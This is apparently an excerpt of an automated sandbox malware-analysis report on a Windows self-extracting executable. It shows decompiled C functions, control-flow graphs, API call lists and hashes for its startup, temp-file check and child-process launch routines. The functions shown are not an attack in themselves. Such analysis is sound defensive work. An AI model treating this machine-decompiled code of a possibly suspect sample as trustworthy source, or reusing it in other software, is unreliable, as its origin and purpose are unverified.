                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                        • API String ID: 2209512893-559176071
                                                                                                                                                                                                        • Opcode ID: 67cde15b1d8b1808cc01aa60da273470a0dbc5216d601c36aa662bc2e725c3c3
                                                                                                                                                                                                        • Instruction ID: 9bf8854e0415d7bf798d1a6509e9fbca04a700a295e13a909688e8e86f70c856
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67cde15b1d8b1808cc01aa60da273470a0dbc5216d601c36aa662bc2e725c3c3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 18115135942228BB9B20DB919C1DEFBBFFCEF157A6F1040A9B809F3110DA305E44D6A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC6A60 Relevance: 13.6, APIs: 9, Instructions: 138sleepCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 533 bc6a60-bc6a91 call bc7155 call bc7208 GetStartupInfoW 539 bc6a93-bc6aa2 533->539 540 bc6abc-bc6abe 539->540 541 bc6aa4-bc6aa6 539->541 542 bc6abf-bc6ac5 540->542 543 bc6aaf-bc6aba Sleep 541->543 544 bc6aa8-bc6aad 541->544 545 bc6ac7-bc6acf _amsg_exit 542->545 546 bc6ad1-bc6ad7 542->546 543->539 544->542 547 bc6b0b-bc6b11 545->547 548 bc6ad9-bc6ae9 call bc6c3f 546->548 549 bc6b05 546->549 551 bc6b2e-bc6b30 547->551 552 bc6b13-bc6b24 _initterm 547->552 553 bc6aee-bc6af2 548->553 549->547 554 bc6b3b-bc6b42 551->554 555 bc6b32-bc6b39 551->555 552->551 553->547 556 bc6af4-bc6b00 553->556 557 bc6b44-bc6b51 call bc7060 554->557 558 bc6b67-bc6b71 554->558 555->554 560 bc6c39-bc6c3e call bc724d 556->560 557->558 566 bc6b53-bc6b65 557->566 559 bc6b74-bc6b79 558->559 562 bc6b7b-bc6b7d 559->562 563 bc6bc5-bc6bc8 559->563 569 bc6b7f-bc6b81 562->569 570 bc6b94-bc6b98 562->570 567 bc6bca-bc6bd3 563->567 568 bc6bd6-bc6be3 _ismbblead 563->568 566->558 567->568 572 bc6be9-bc6bed 568->572 573 bc6be5-bc6be6 568->573 569->563 574 bc6b83-bc6b85 569->574 575 bc6b9a-bc6b9e 570->575 576 bc6ba0-bc6ba2 570->576 572->559 578 bc6c1e-bc6c25 572->578 573->572 574->570 579 bc6b87-bc6b8a 574->579 580 bc6ba3-bc6bbc call bc2bfb 575->580 576->580 581 bc6c27-bc6c2d _cexit 578->581 582 bc6c32 578->582 579->570 583 bc6b8c-bc6b92 579->583 580->578 586 bc6bbe-bc6bbf exit 580->586 581->582 582->560 583->574 586->563
                                                                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00BC7155();
				_push(0x58);
				_push(0xbc72b8);
				E00BC7208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0xbc88b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0xbc88b0; // 0x2
						if(__eflags != 0) {
							 *0xbc81e4 = _t58;
							goto L13;
						} else {
							 *0xbc88b0 = _t58;
							_t37 = E00BC6C3F(0xbc10b8, 0xbc10c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00BC6FF4();
						L13:
						_t68 =  *0xbc88b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0xbc10b4);
							_push(0xbc10ac);
							L00BC7202();
							 *0xbc88b0 = 2;
						}
						if(_t53 == 0) {
							 *0xbc88ac = 0;
						}
						_t71 =  *0xbc88b4;
						if( *0xbc88b4 != 0 && E00BC7060(_t71, 0xbc88b4) != 0) {
							_t60 =  *0xbc88b4; // 0x0
							 *0xbca288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x74895b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00BC2BFB(0xbc0000, 0, _t59); // executed
							 *0xbc81e0 = _t30;
							__eflags =  *0xbc81f8;
							if( *0xbc81f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0xbc81e4;
							if( *0xbc81e4 == 0) {
								__imp___cexit();
								_t30 =  *0xbc81e0; // 0x0
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E00BC724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}


















                                                                                                                                                                                                        0x00bc6a60
                                                                                                                                                                                                        0x00bc6a6a
                                                                                                                                                                                                        0x00bc6a6c
                                                                                                                                                                                                        0x00bc6a71
                                                                                                                                                                                                        0x00bc6a78
                                                                                                                                                                                                        0x00bc6a7f
                                                                                                                                                                                                        0x00bc6a85
                                                                                                                                                                                                        0x00bc6a8e
                                                                                                                                                                                                        0x00bc6a91
                                                                                                                                                                                                        0x00bc6a93
                                                                                                                                                                                                        0x00bc6a9c
                                                                                                                                                                                                        0x00bc6aa2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc6aa6
                                                                                                                                                                                                        0x00bc6ab4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc6aa8
                                                                                                                                                                                                        0x00bc6aaa
                                                                                                                                                                                                        0x00bc6aab
                                                                                                                                                                                                        0x00bc6aab
                                                                                                                                                                                                        0x00bc6abf
                                                                                                                                                                                                        0x00bc6abf
                                                                                                                                                                                                        0x00bc6ac5
                                                                                                                                                                                                        0x00bc6ad1
                                                                                                                                                                                                        0x00bc6ad7
                                                                                                                                                                                                        0x00bc6b05
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc6ad9
                                                                                                                                                                                                        0x00bc6ad9
                                                                                                                                                                                                        0x00bc6ae9
                                                                                                                                                                                                        0x00bc6af0
                                                                                                                                                                                                        0x00bc6af2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc6af4
                                                                                                                                                                                                        0x00bc6af4
                                                                                                                                                                                                        0x00bc6afb
                                                                                                                                                                                                        0x00bc6afb
                                                                                                                                                                                                        0x00bc6af2
                                                                                                                                                                                                        0x00bc6ac7
                                                                                                                                                                                                        0x00bc6ac7
                                                                                                                                                                                                        0x00bc6ac9
                                                                                                                                                                                                        0x00bc6b0b
                                                                                                                                                                                                        0x00bc6b0b
                                                                                                                                                                                                        0x00bc6b11
                                                                                                                                                                                                        0x00bc6b13
                                                                                                                                                                                                        0x00bc6b18
                                                                                                                                                                                                        0x00bc6b1d
                                                                                                                                                                                                        0x00bc6b24
                                                                                                                                                                                                        0x00bc6b24
                                                                                                                                                                                                        0x00bc6b30
                                                                                                                                                                                                        0x00bc6b39
                                                                                                                                                                                                        0x00bc6b39
                                                                                                                                                                                                        0x00bc6b3b
                                                                                                                                                                                                        0x00bc6b42
                                                                                                                                                                                                        0x00bc6b57
                                                                                                                                                                                                        0x00bc6b5f
                                                                                                                                                                                                        0x00bc6b65
                                                                                                                                                                                                        0x00bc6b65
                                                                                                                                                                                                        0x00bc6b67
                                                                                                                                                                                                        0x00bc6b6c
                                                                                                                                                                                                        0x00bc6b6e
                                                                                                                                                                                                        0x00bc6b71
                                                                                                                                                                                                        0x00bc6b74
                                                                                                                                                                                                        0x00bc6b74
                                                                                                                                                                                                        0x00bc6b79
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc6b7d
                                                                                                                                                                                                        0x00bc6b81
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc6b83
                                                                                                                                                                                                        0x00bc6b8c
                                                                                                                                                                                                        0x00bc6b8d
                                                                                                                                                                                                        0x00bc6b90
                                                                                                                                                                                                        0x00bc6b90
                                                                                                                                                                                                        0x00bc6b83
                                                                                                                                                                                                        0x00bc6b81
                                                                                                                                                                                                        0x00bc6b94
                                                                                                                                                                                                        0x00bc6b98
                                                                                                                                                                                                        0x00bc6ba2
                                                                                                                                                                                                        0x00bc6b9a
                                                                                                                                                                                                        0x00bc6b9a
                                                                                                                                                                                                        0x00bc6b9a
                                                                                                                                                                                                        0x00bc6ba3
                                                                                                                                                                                                        0x00bc6bab
                                                                                                                                                                                                        0x00bc6bb0
                                                                                                                                                                                                        0x00bc6bb5
                                                                                                                                                                                                        0x00bc6bbc
                                                                                                                                                                                                        0x00bc6bbf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc6bbf
                                                                                                                                                                                                        0x00bc6c1e
                                                                                                                                                                                                        0x00bc6c25
                                                                                                                                                                                                        0x00bc6c27
                                                                                                                                                                                                        0x00bc6c2d
                                                                                                                                                                                                        0x00bc6c2d
                                                                                                                                                                                                        0x00bc6c32
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc6bc5
                                                                                                                                                                                                        0x00bc6bc5
                                                                                                                                                                                                        0x00bc6bc8
                                                                                                                                                                                                        0x00bc6bcc
                                                                                                                                                                                                        0x00bc6bce
                                                                                                                                                                                                        0x00bc6bce
                                                                                                                                                                                                        0x00bc6bd1
                                                                                                                                                                                                        0x00bc6bd3
                                                                                                                                                                                                        0x00bc6bd3
                                                                                                                                                                                                        0x00bc6bd6
                                                                                                                                                                                                        0x00bc6bda
                                                                                                                                                                                                        0x00bc6be1
                                                                                                                                                                                                        0x00bc6be3
                                                                                                                                                                                                        0x00bc6be5
                                                                                                                                                                                                        0x00bc6be5
                                                                                                                                                                                                        0x00bc6be6
                                                                                                                                                                                                        0x00bc6be6
                                                                                                                                                                                                        0x00bc6be9
                                                                                                                                                                                                        0x00bc6bea
                                                                                                                                                                                                        0x00bc6bea
                                                                                                                                                                                                        0x00bc6b74
                                                                                                                                                                                                        0x00bc6c39
                                                                                                                                                                                                        0x00bc6c3e
                                                                                                                                                                                                        0x00bc6c3e
                                                                                                                                                                                                        0x00bc6abe
                                                                                                                                                                                                        0x00bc6abe
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00BC7182
                                                                                                                                                                                                          • Part of subcall function 00BC7155: GetCurrentProcessId.KERNEL32 ref: 00BC7191
                                                                                                                                                                                                          • Part of subcall function 00BC7155: GetCurrentThreadId.KERNEL32 ref: 00BC719A
                                                                                                                                                                                                          • Part of subcall function 00BC7155: GetTickCount.KERNEL32 ref: 00BC71A3
                                                                                                                                                                                                          • Part of subcall function 00BC7155: QueryPerformanceCounter.KERNEL32(?), ref: 00BC71B8
                                                                                                                                                                                                        • GetStartupInfoW.KERNEL32(?,00BC72B8,00000058), ref: 00BC6A7F
                                                                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00BC6AB4
                                                                                                                                                                                                        • _amsg_exit.MSVCRT ref: 00BC6AC9
                                                                                                                                                                                                        • _initterm.MSVCRT ref: 00BC6B1D
                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00BC6B49
                                                                                                                                                                                                        • exit.KERNELBASE ref: 00BC6BBF
                                                                                                                                                                                                        • _ismbblead.MSVCRT ref: 00BC6BDA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836923961-0
                                                                                                                                                                                                        • Opcode ID: 0e06aaf8efc660c6697265219bfa2413426eb7b21922c2fb1c14a210a3e06597
                                                                                                                                                                                                        • Instruction ID: ab55928943c4bd898d4c530a19ff799f84373e40cf4b07fa2bf2b2aa024487e4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e06aaf8efc660c6697265219bfa2413426eb7b21922c2fb1c14a210a3e06597
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA41B271A482299FDB219B68DC46F6A77E4EB4D720F2441AEE841E72A1CF748C418B91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC58C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74memoryfileCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 587 bc58c8-bc58d5 588 bc58d8-bc58dd 587->588 588->588 589 bc58df-bc58f1 LocalAlloc 588->589 590 bc5919-bc5959 call bc1680 call bc658a CreateFileA LocalFree 589->590 591 bc58f3-bc5901 call bc44b9 589->591 594 bc5906-bc5910 call bc6285 590->594 601 bc595b-bc596c CloseHandle GetFileAttributesA 590->601 591->594 600 bc5912-bc5918 594->600 601->594 602 bc596e-bc5970 601->602 602->594 603 bc5972-bc597b 602->603 603->600
                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00BC58C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00BC1680(_t20, _t36, _t33);
					E00BC658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0xbc9124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E00BC44B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0xbc9124 = E00BC6285();
					_t14 = 0;
				}
				return _t14;
			}













                                                                                                                                                                                                        0x00bc58cd
                                                                                                                                                                                                        0x00bc58d1
                                                                                                                                                                                                        0x00bc58d3
                                                                                                                                                                                                        0x00bc58d5
                                                                                                                                                                                                        0x00bc58d8
                                                                                                                                                                                                        0x00bc58d8
                                                                                                                                                                                                        0x00bc58da
                                                                                                                                                                                                        0x00bc58db
                                                                                                                                                                                                        0x00bc58e1
                                                                                                                                                                                                        0x00bc58ed
                                                                                                                                                                                                        0x00bc58f1
                                                                                                                                                                                                        0x00bc591e
                                                                                                                                                                                                        0x00bc592c
                                                                                                                                                                                                        0x00bc5943
                                                                                                                                                                                                        0x00bc594a
                                                                                                                                                                                                        0x00bc594d
                                                                                                                                                                                                        0x00bc5953
                                                                                                                                                                                                        0x00bc5959
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc595b
                                                                                                                                                                                                        0x00bc595c
                                                                                                                                                                                                        0x00bc5963
                                                                                                                                                                                                        0x00bc596c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5972
                                                                                                                                                                                                        0x00bc5974
                                                                                                                                                                                                        0x00bc597a
                                                                                                                                                                                                        0x00bc597a
                                                                                                                                                                                                        0x00bc596c
                                                                                                                                                                                                        0x00bc58f3
                                                                                                                                                                                                        0x00bc5901
                                                                                                                                                                                                        0x00bc5906
                                                                                                                                                                                                        0x00bc590b
                                                                                                                                                                                                        0x00bc5910
                                                                                                                                                                                                        0x00bc5910
                                                                                                                                                                                                        0x00bc5918

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00BC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC58E7
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00BC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC5943
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00BC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC594D
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00BC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC595C
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00BC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC5963
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
                                                                                                                                                                                                        • API String ID: 747627703-188559970
                                                                                                                                                                                                        • Opcode ID: 2731d8cd92854eda050983c22e32b72040a59fbda38b246f388030ad71755567
                                                                                                                                                                                                        • Instruction ID: 0fd154452d740a0f6add0645db757c1606405567711d2d0d9d08711b0eb6c08d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2731d8cd92854eda050983c22e32b72040a59fbda38b246f388030ad71755567
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 331126716002147BD7241F7A5C4DF9B7FD9DF8A364B100699F506E3191CEB0A84582B0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC3FEF Relevance: 10.6, APIs: 7, Instructions: 97processsynchronizationwindowCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 631 bc3fef-bc4010 632 bc410a-bc411a call bc6ce0 631->632 633 bc4016-bc403b CreateProcessA 631->633 634 bc40c4-bc4101 call bc6285 GetLastError FormatMessageA call bc44b9 633->634 635 bc4041-bc406e WaitForSingleObject GetExitCodeProcess 633->635 650 bc4106 634->650 638 bc4070-bc4077 635->638 639 bc4091 call bc411b 635->639 638->639 643 bc4079-bc407b 638->643 645 bc4096-bc40b8 CloseHandle * 2 639->645 643->639 644 bc407d-bc4089 643->644 644->639 647 bc408b 644->647 648 bc4108 645->648 649 bc40ba-bc40c0 645->649 647->639 648->632 649->648 651 bc40c2 649->651 650->648 651->650
                                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                                        			E00BC3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00BC6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0xbc9124 = E00BC6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
					_t45 = 0x4c4;
					E00BC44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0xbc8a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0xbc9a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0xbc9a2c = _t44;
						}
					}
				}
				E00BC411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0xbc9a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}


















                                                                                                                                                                                                        0x00bc3fef
                                                                                                                                                                                                        0x00bc3ffa
                                                                                                                                                                                                        0x00bc4001
                                                                                                                                                                                                        0x00bc4008
                                                                                                                                                                                                        0x00bc400a
                                                                                                                                                                                                        0x00bc400b
                                                                                                                                                                                                        0x00bc4010
                                                                                                                                                                                                        0x00bc410a
                                                                                                                                                                                                        0x00bc411a
                                                                                                                                                                                                        0x00bc411a
                                                                                                                                                                                                        0x00bc401c
                                                                                                                                                                                                        0x00bc401d
                                                                                                                                                                                                        0x00bc401e
                                                                                                                                                                                                        0x00bc401f
                                                                                                                                                                                                        0x00bc4033
                                                                                                                                                                                                        0x00bc403b
                                                                                                                                                                                                        0x00bc40ca
                                                                                                                                                                                                        0x00bc40e9
                                                                                                                                                                                                        0x00bc40f8
                                                                                                                                                                                                        0x00bc4101
                                                                                                                                                                                                        0x00bc4106
                                                                                                                                                                                                        0x00bc4106
                                                                                                                                                                                                        0x00bc4108
                                                                                                                                                                                                        0x00bc4108
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4108
                                                                                                                                                                                                        0x00bc4049
                                                                                                                                                                                                        0x00bc405c
                                                                                                                                                                                                        0x00bc4062
                                                                                                                                                                                                        0x00bc4068
                                                                                                                                                                                                        0x00bc406e
                                                                                                                                                                                                        0x00bc4070
                                                                                                                                                                                                        0x00bc4077
                                                                                                                                                                                                        0x00bc407f
                                                                                                                                                                                                        0x00bc4089
                                                                                                                                                                                                        0x00bc408b
                                                                                                                                                                                                        0x00bc408b
                                                                                                                                                                                                        0x00bc4089
                                                                                                                                                                                                        0x00bc4077
                                                                                                                                                                                                        0x00bc4091
                                                                                                                                                                                                        0x00bc409c
                                                                                                                                                                                                        0x00bc40a8
                                                                                                                                                                                                        0x00bc40b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc40c2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc40c2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00BC4033
                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BC4049
                                                                                                                                                                                                        • GetExitCodeProcess.KERNELBASE ref: 00BC405C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00BC409C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00BC40A8
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00BC40DC
                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00BC40E9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3183975587-0
                                                                                                                                                                                                        • Opcode ID: 5a3c322bce1b33cbf18abee525da4b48622a74d1489d10c69ee4a4af5d8100de
